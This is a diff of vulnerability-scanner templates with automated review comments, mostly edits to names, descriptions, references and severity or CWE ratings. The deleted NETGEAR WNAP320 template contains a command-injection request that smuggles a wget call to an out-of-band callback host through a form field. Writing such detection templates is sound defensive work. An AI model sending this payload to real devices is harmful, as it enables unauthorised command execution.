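Review bot: "is vulnerable to an easily exploitable vulnerability" in the new description is redundant; suggest "contains an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server". The replaced description's closing sentence ("Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server") was dropped, yet it is the impact statement the name's "Remote Code Execution" rests on; consider keeping it. The reference list also lacks the nvd.nist.gov page the rest of the commit adds.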
@ -34,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05

View File

@ -1,17 +1,19 @@
id: CVE-2020-17362
info:
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
description: "Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php."
reference:
- https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
- https://nvd.nist.gov/vuln/detail/CVE-2020-17362
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-17362
cwe-id: CWE-79
tags: cve,cve2020,wordpress,xss,wp-plugin
requests:
- method: GET
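Review bot: the replaced description identified Nova Lite as a WordPress theme ("search.php in the Nova Lite theme before 1.3.9"), but the new one drops the word and the tags still say `wp-plugin`; say "theme" in the description and check whether `wp-plugin` is the right tag for a theme.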
@ -38,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/04

View File

@ -1,17 +1,19 @@
id: CVE-2020-17496
info:
name: vBulletin Pre-Auth RCE
name: vBulletin Pre-Auth Remote Command Execution
author: pussycat0x
severity: critical
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
description: |
vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
tags: cve,cve2020,vbulletin,rce
description: "vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759."
reference:
- https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
- https://nvd.nist.gov/vuln/detail/CVE-2020-17496
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-17496
cwe-id: CWE-74
tags: cve,cve2020,vbulletin,rce
requests:
- raw:
@ -31,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01

View File

@ -1,18 +1,20 @@
id: CVE-2020-35774
info:
name: Twitter Server XSS
name: twitter-server Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
server/handler/HistogramQueryHandler.scala in Twitter TwitterServer (aka twitter-server) before 20.12.0, in some configurations, allows XSS via the /histograms endpoint.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-35774
tags: cve,cve2020,xss,twitter-server
twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
reference:
- https://advisory.checkmarx.net/advisory/CX-2020-4287
- https://nvd.nist.gov/vuln/detail/CVE-2020-35774
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-35774
cwe-id: CWE-79
tags: cve,cve2020,xss,twitter-server
requests:
- method: GET
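Review bot: the new description drops the "/histograms endpoint" detail the replaced one carried; since that is the affected path, keep it, e.g. "... in the histograms component (/histograms endpoint) via server/handler/HistogramQueryHandler.scala".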
@ -22,9 +24,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
@ -34,3 +36,5 @@ requests:
part: header
words:
- text/html
# Enhanced by mp on 2022/04/04

View File

@ -5,15 +5,16 @@ info:
author: dwisiswant0
severity: critical
description: |
resetpassword method of the Auth controller,
which is responsible for changing the user password using the reset token.
reference: https://swarm.ptsecurity.com/rce-cockpit-cms/
tags: cve,cve2020,nosqli,sqli,cockpit,injection
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
reference:
- https://swarm.ptsecurity.com/rce-cockpit-cms/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35847
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-35847
cwe-id: CWE-89
tags: cve,cve2020,nosqli,sqli,cockpit,injection
requests:
- method: POST
@ -33,3 +34,5 @@ requests:
part: body
regex:
- 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9]+)"'
# Enhanced by mp on 2022/04/04

View File

@ -1,16 +1,19 @@
id: CVE-2020-7247
info:
name: OpenSMTPD 6.4.0 - 6.6.1 Remote Code Execution
author: princechaddha
severity: critical
reference: https://www.openwall.com/lists/oss-security/2020/01/28/3
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
reference:
- https://www.openwall.com/lists/oss-security/2020/01/28/3
- https://nvd.nist.gov/vuln/detail/CVE-2020-7247
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-7247
cwe-id: CWE-78,CWE-755
description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
description: "OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation."
tags: cve,cve2020,smtp,opensmtpd,network,rce,oast
network:
- inputs:
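Review bot: the description stays a single double-quoted scalar with escaped \" characters, while the other templates in this commit move long descriptions to a `|` block scalar; converting it here removes the escaping and the very long line. The prepended sentence "OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution." repeats the range already in `name` and then the original text says "OpenSMTPD 6.6", so the affected range is now stated twice in two different ways; state it once.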
@ -41,4 +44,6 @@ network:
- type: word
part: raw
words:
- "Message accepted for delivery"
- "Message accepted for delivery"
# Enhanced by mp on 2022/04/04

View File

@ -5,14 +5,16 @@ info:
author: pikpikcu
severity: high
description: |
When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
reference: https://github.com/apache/skywalking/pull/4639
tags: cve,cve2020,sqli,skywalking
When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
reference:
- https://github.com/apache/skywalking/pull/4639
- https://nvd.nist.gov/vuln/detail/CVE-2020-9483
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2020-9483
cwe-id: CWE-89
tags: cve,cve2020,sqli,skywalking
requests:
- method: POST
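Review bot: the rewritten description still does not parse: in "When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability" the second clause has no verb. Suggest: "When H2, MySQL or TiDB is used as Apache SkyWalking storage, metadata queries made through the GraphQL protocol are vulnerable to SQL injection, which allows access to unexpected data."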
@ -41,3 +43,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05

View File

@ -1,7 +1,7 @@
id: CVE-2020-9484
info:
name: Apache Tomcat RCE by deserialization
name: Apache Tomcat Remote Command Execution
author: dwisiswant0
severity: high
description: |
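Review bot: the new name `Apache Tomcat Remote Command Execution` mislabels the issue and loses the context the old name carried. CVE-2020-9484 is remote code execution via deserialization of an attacker-controlled session file (conditions a) to d) below, and the matchers look for `ObjectInputStream` / `PersistentManagerBase`), not OS command injection. Suggest `Apache Tomcat Session Deserialization Remote Code Execution` or keep the previous name.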
@ -11,7 +11,9 @@ info:
c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
Note that all of conditions a) to d) must be true for the attack to succeed.
reference: http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
reference:
- http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-9484
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.00
@ -39,3 +41,5 @@ requests:
- "ObjectInputStream"
- "PersistentManagerBase"
condition: and
# Enhanced by mp on 2022/04/04

View File

@ -1,20 +1,20 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Exposure of Sensitive Information to an Unauthorized Actor
name: TCExam <= 14.8.1 Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which included sensitive database backup files.
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
reference:
- https://es-la.tenable.com/security/research/tra-2021-32?tns_redirect=true
- https://nvd.nist.gov/vuln/detail/CVE-2021-20114
tags: cve,cve2021,tcexam,disclosure,exposure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-20114
cwe-id: CWE-200
tags: cve,cve2021,tcexam,disclosure,exposure
requests:
- method: GET
path:
@ -32,3 +32,6 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/04/05

View File

@ -4,7 +4,7 @@ info:
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
author: gy741
severity: medium
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. A user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
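Review bot: removing "Authentication can be bypassed" from the description deletes the one sentence that names the actual weakness; what is left only describes the symptom. Since the extractor below pulls `admin_passwd` out of an admin-only page, keep the bypass explicit, e.g. "The setup wizard redirect bypasses authentication, so a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page."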
@ -52,3 +52,5 @@ requests:
group: 1
regex:
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
# Enhanced by mp on 2022/04/05

View File

@ -1,20 +1,21 @@
id: CVE-2021-21234
info:
name: Spring Boot Actuator Logview - Directory Traversal
name: Spring Boot Actuator Logview Directory Traversal
author: gy741,pikpikcu
severity: high
description: spring-boot-actuator-logview in a library that adds a simple logfile viewer as spring boot actuator endpoint. It is maven package "eu.hinsch:spring-boot-actuator-logview". In spring-boot-actuator-logview before version 0.2.13 there is a directory traversal vulnerability.
description: |
spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability in libraries that adds a simple logfile viewer as a spring boot actuator endpoint (maven package "eu.hinsch:spring-boot-actuator-logview".
reference:
- https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
- https://github.com/cristianeph/vulnerability-actuator-log-viewer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21234
tags: cve,cve2021,springboot,lfi,actuator
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.70
cve-id: CVE-2021-21234
cwe-id: CWE-22
tags: cve,cve2021,springboot,lfi,actuator
requests:
- method: GET
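Review bot: the rewritten description has an unclosed parenthesis and a subject/verb mismatch: `in libraries that adds a simple logfile viewer ... (maven package "eu.hinsch:spring-boot-actuator-logview".` Suggest: `spring-boot-actuator-logview before version 0.2.13 contains a directory traversal vulnerability. The library adds a simple logfile viewer as a Spring Boot Actuator endpoint (Maven package "eu.hinsch:spring-boot-actuator-logview").` Also worth reconciling: the cvss-metrics say PR:L while the first reference title describes the traversal as unauthenticated; a one-line comment on which is intended would stop the next editor from changing it.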
@ -39,4 +40,6 @@ requests:
- "contains(body, 'fonts')"
- "contains(body, 'extensions')"
- "status_code == 200"
condition: and
condition: and
# Enhanced by mp on 2022/04/01

View File

@ -1,10 +1,10 @@
id: CVE-2021-28854
info:
name: VICIdial - Multiple sensitive Information disclosure
name: VICIdial Sensitive Information Disclosure
author: pdteam
severity: high
description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021.
description: VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.
reference: https://github.com/JHHAX/VICIdial
classification:
cve-id: CVE-2021-28854
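Review bot: `reference:` is left as a bare string here while every other CVE template in this commit is converted to a list with the NVD entry appended; do the same and add https://nvd.nist.gov/vuln/detail/CVE-2021-28854. The rewrite also drops "This vulnerability affects all versions as of 20/5/2021." without putting any affected-version statement in its place, so the description now says nothing about which versions are affected.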
@ -30,3 +30,5 @@ requests:
words:
- 'vdc_db_query'
part: body
# Enhanced by mp on 2022/04/06

View File

@ -1,19 +1,20 @@
id: CVE-2021-3019
info:
name: Lanproxy Directory Traversal
name: ffay lanproxy Directory Traversal
author: pikpikcu
severity: high
description: ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
description: "ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet."
reference:
- https://github.com/ffay/lanproxy/commits/master
- https://github.com/maybe-why-not/lanproxy/issues/1
tags: cve,cve2021,lanproxy,lfi
- https://nvd.nist.gov/vuln/detail/CVE-2021-3019
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-3019
cwe-id: CWE-22
tags: cve,cve2021,lanproxy,lfi
requests:
- method: GET
@ -36,3 +37,5 @@ requests:
- "config.admin.password"
condition: and
part: body
# Enhanced by mp on 2022/04/04

View File

@ -1,20 +1,20 @@
id: CVE-2021-3293
info:
name: Emlog 5.3.1 Path Disclosure
description: emlog v5.3.1 has full path disclosure vulnerability in t/index.php, which allows an attacker to see the path to the webroot/file.
name: emlog 5.3.1 Path Disclosure
description: "emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file."
author: h1ei1
severity: high
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
- https://github.com/emlog/emlog/issues/62
- https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md
tags: cve,cve2021,emlog,fpd
- https://nvd.nist.gov/vuln/detail/CVE-2021-3293
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-3293
cwe-id: CWE-22
tags: cve,cve2021,emlog,fpd
requests:
- raw:
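Review bot: cwe-id CWE-22 (path traversal) does not describe a full path disclosure; the matchers look for `<b>Warning</b>`, `on line` and `expects parameter`, i.e. a PHP warning leaking the webroot path, which is CWE-209 (error message information exposure) or at least CWE-200. `severity: high` with a C:H vector for a path leak is likewise overstated. If both values are intentionally mirrored from NVD, say so in a comment so the mismatch with the `fpd` tag is understood rather than re-edited.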
@ -33,4 +33,6 @@ requests:
- "<b>Warning</b>"
- "on line"
- "expects parameter"
condition: and
condition: and
# Enhanced by mp on 2022/04/04

View File

@ -35,4 +35,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/28
# Enhanced by cs on 2022/04/01

View File

@ -1,14 +1,16 @@
id: visual-tools-dvr-rce
id: CVE-2021-42071
info:
name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
name: Visual Tools DVR VX16 4.2.28.0 Unauthenticated OS Command Injection
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://www.exploit-db.com/exploits/50098
- https://nvd.nist.gov/vuln/detail/CVE-2021-42071
classification:
cve-id: CVE-2021-42071
tags: visualtools,rce,oast,injection
requests:
- raw:
- |
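Review bot: the id is renamed to CVE-2021-42071 but `tags` is left as `visualtools,rce,oast,injection` without `cve,cve2021`, which every other CVE template in this commit carries and which the cve-based filters rely on; add them. The description fix is correct: the old text said "authenticated" while the name said unauthenticated, and the new text resolves that in favour of the name and the exploit-db reference.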

View File

@ -5,7 +5,6 @@ info:
author: davidmckennirey
severity: high
description: Versa Networks SD-WAN application default admin credentials were discovered.
tags: default-login,versa,sdwan
reference:
- https://versa-networks.com/products/sd-wan.php
classification:
@ -13,6 +12,7 @@ info:
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: default-login,versa,sdwan
requests:
- raw:
@ -52,4 +52,4 @@ requests:
- "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')"
negative: true
# Enhanced by mp on 2022/03/11
# Enhanced by mp on 2022/04/06

View File

@ -4,8 +4,7 @@ info:
name: VisionHub Default Login
author: Techryptic (@Tech)
severity: high
description: VisionHub application default admin credentials were discovered.
tags: visionhub,default-login
description: VisionHub application default admin credentials were accepted.
reference:
- https://www.qognify.com/products/visionhub/
classification:
@ -13,6 +12,7 @@ info:
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: visionhub,default-login
requests:
- raw:
@ -39,4 +39,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/13
# Enhanced by mp on 2022/04/06

View File

@ -5,7 +5,6 @@ info:
author: pdteam
description: WebLogic default login credentials were discovered.
severity: high
tags: default-login,weblogic
reference:
- https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
- https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
@ -14,6 +13,7 @@ info:
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: default-login,weblogic
requests:
- raw:
@ -65,4 +65,4 @@ requests:
status:
- 302
# Enhanced by mp on 2022/03/14
# Enhanced by mp on 2022/04/05

View File

@ -8,12 +8,12 @@ info:
reference:
- https://docs.wso2.com/display/UES100/Accessing+the+Management+Console
- https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/
tags: default-login,wso2
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: default-login,wso2
requests:
- raw:
@ -40,4 +40,4 @@ requests:
part: header
condition: and
# Enhanced by mp on 2022/03/13
# Enhanced by mp on 2022/04/05

View File

@ -7,12 +7,12 @@ info:
description: "Zmanda default admin credentials admin:admin were discovered."
reference:
- https://www.zmanda.com
tags: zmanda,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
tags: zmanda,default-login
requests:
- raw:
@ -41,4 +41,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/03/13
# Enhanced by mp on 2022/04/04

View File

@ -1,28 +1,37 @@
id: iotawatt-app-exposure
info:
name: IoTaWatt Configuration app
author: pussycat0x
severity: high
description: unauthenticated IoTaWatt energy monitor leads to upload to any of several third-party energy websites/database
metadata:
fofa-query: 'app="IoTaWatt-Configuration-app"'
tags: iot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<h3>Configure IoTaWatt Device</h3>'
- '<title>IoTaWatt Configuration app</title>'
condition: and
part: body
- type: status
status:
- 200
id: iotawatt-app-exposure
info:
name: IoTaWatt Configuration App Exposure
author: pussycat0x
severity: high
description: An IoTaWatt configuration app was discovered. Unauthenticated access to an IoTaWatt energy monitor could give a malicious attacker the means to upload to any of several third-party energy websites/database.
reference:
- https://docs.iotawatt.com/en/master/passConfig.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id:
cwe-id: CWE-522
metadata:
fofa-query: 'app="IoTaWatt-Configuration-app"'
tags: iot,exposure
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<h3>Configure IoTaWatt Device</h3>'
- '<title>IoTaWatt Configuration app</title>'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/04/01
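Review bot: the added classification maps an unauthenticated configuration UI to CWE-522 (Insufficiently Protected Credentials) with an 8.3 score, but nothing in the description or the matchers involves credentials; CWE-306 (Missing Authentication for Critical Function) describes what this template actually detects. The description also still reads "upload to any of several third-party energy websites/database"; suggest "upload data to any of several third-party energy websites or databases".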

View File

@ -2,12 +2,11 @@ id: aem-userinfo-servlet
info:
author: DhiyaneshDk
name: AEM UserInfo Servlet
name: AEM UserInfo Servlet Credentials Exposure
severity: info
description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node.
description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node."
tags: aem,bruteforce
requests:
- method: GET
path:
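Review bot: the new name `AEM UserInfo Servlet Credentials Exposure` claims more than the description supports. The text says the servlet lets an attacker brute-force credentials and harvest valid usernames from JCR attributes; it does not say credentials are exposed, and the template stays at `severity: info` with a `bruteforce` tag. `AEM UserInfo Servlet Exposure` or `AEM UserInfo Servlet Username Enumeration` would match the text.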
@ -29,3 +28,5 @@ requests:
part: header
words:
- 'application/json'
# Enhanced by mp on 2022/04/05

View File

@ -1,28 +1,35 @@
id: phpmyadmin-misconfiguration
info:
name: Sensitive data exposure
author: pussycat0x
severity: high
description: Unauthenticated phpmyadmin leads to exposure of sensitive information
reference: https://www.exploit-db.com/ghdb/6997
tags: phpmyadmin,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/phpmyadmin/index.php?db=information_schema"
- "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "var db = 'information_schema';"
- "var opendb_url = 'db_structure.php';"
condition: and
- type: status
status:
- 200
id: phpmyadmin-misconfiguration
info:
name: phpmyadmin Data Exposure
author: pussycat0x
severity: medium
description: An unauthenticated instance of phpmyadmin was discovered, which could be leveraged to access sensitive information.
reference: https://www.exploit-db.com/ghdb/6997
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id:
cwe-id: CWE-200
tags: phpmyadmin,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/phpmyadmin/index.php?db=information_schema"
- "{{BaseURL}}/phpMyAdmin/index.php?db=information_schema"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "var db = 'information_schema';"
- "var opendb_url = 'db_structure.php';"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/04/06
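Review bot: severity is lowered from high to medium with a C:L/I:N vector, but an unauthenticated phpMyAdmin instance that opens `information_schema` (which is what the `var db = 'information_schema';` matcher confirms) gives read and, in the usual configuration, write access to every database the backend user can reach. C:H at minimum, and arguably I:H, is the honest rating. If the downgrade is deliberate because the template only proves reachability, put that reasoning in a comment; otherwise keep high.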

View File

@ -1,10 +1,12 @@
id: unauthenticated-zipkin
info:
name: Unauthenticated Zipkin
name: Zipkin Discovery
author: dhiyaneshDk
severity: high
description: Unauthenticated access to Zipkin
description: Unauthenticated access to Zipkin was discovered.
reference:
- https://zipkin.io/
tags: unauth
requests:
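Review bot: renaming to `Zipkin Discovery` makes this read like a technology-detection template, yet it keeps `severity: high` and the `unauth` tag and the matchers test an unauthenticated API response. The name and the severity should not disagree: either call it `Zipkin Unauthenticated Access` or drop the severity to info. Adding a product tag (`zipkin`) alongside `unauth` would also make it filterable like the other templates here.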
@ -29,3 +31,5 @@ requests:
- defaultLookback
part: body
condition: and
# Enhanced by mp on 2022/04/06

View File

@ -3,9 +3,14 @@ id: neos-detect
info:
name: Neos CMS detection
author: k11h-de
description: some Neos websites remove the X-Flow-Powered Header, but they usually all have a comment line at the top of the body
description: Neos CMS was detected.
severity: info
reference: https://github.com/neos/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cve-id:
cwe-id: CWE-200
tags: tech,neos,cms
requests:
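Review bot: the new classification block gives a tech-detection template `cwe-id: CWE-200` and an all-N CVSS vector scored 0.0; CWE-200 asserts an information exposure that detecting a CMS is not, and a 0.0 score carries no information. Drop the block, as the other `tech` templates do, or leave cwe-id empty. The replaced description (some Neos sites strip the X-Flow-Powered header but keep a comment at the top of the body) explained why the template matches on the body as well as the header; keep that rationale as a comment next to the matcher so the body check is not removed as redundant later.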
@ -23,4 +28,6 @@ requests:
extractors:
- type: kval
kval:
- 'x_flow_powered'
- 'x_flow_powered'
# Enhanced by mp on 2022/04/01

View File

@ -1,26 +0,0 @@
id: netgear-wnap320-rce
info:
name: NETGEAR WNAP320 Access Point - Remote Code Execution (Unauthenticated)
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
tags: netgear,rce,oast,router
requests:
- raw:
- |
POST /boardDataWW.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"

View File

@ -1,13 +1,18 @@
id: optilink-ont1gew-gpon-rce
info:
name: OptiLink ONT1GEW GPON - Pre-Auth Remote Code Execution
name: OptiLink ONT1GEW GPON Remote Code Execution
author: gy741
severity: critical
description: vulnerabilities in the web-based management interface of OptiLink could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
description: OptiLink is susceptible to remote code execution vulnerabilities which could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
reference:
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cve-id:
cwe-id: CWE-77
tags: optiLink,rce,oast,mirai
requests:
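Review bot: the new description keeps "an authenticated, remote attacker" while the old name said Pre-Auth, the added cvss-metrics say PR:N, and the new name `OptiLink ONT1GEW GPON Remote Code Execution` drops the pre-auth qualifier, so the fields now disagree with each other. Settle on one: if the issue is unauthenticated (matching PR:N and the packetstorm reference), write "unauthenticated, remote attacker" and keep Pre-Auth in the name. Also `cwe-id: CWE-77` plus a 10.0 score is fine, but `tags: optiLink` should be lowercase like every other product tag.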
@ -29,3 +34,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/04/01

View File

@ -1,7 +1,7 @@
id: vrealize-operations-log4j-rce
info:
name: VMware vRealize Operations Tenant App Log4j JNDI RCE
name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution
author: bughuntersurya
severity: critical
description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application.
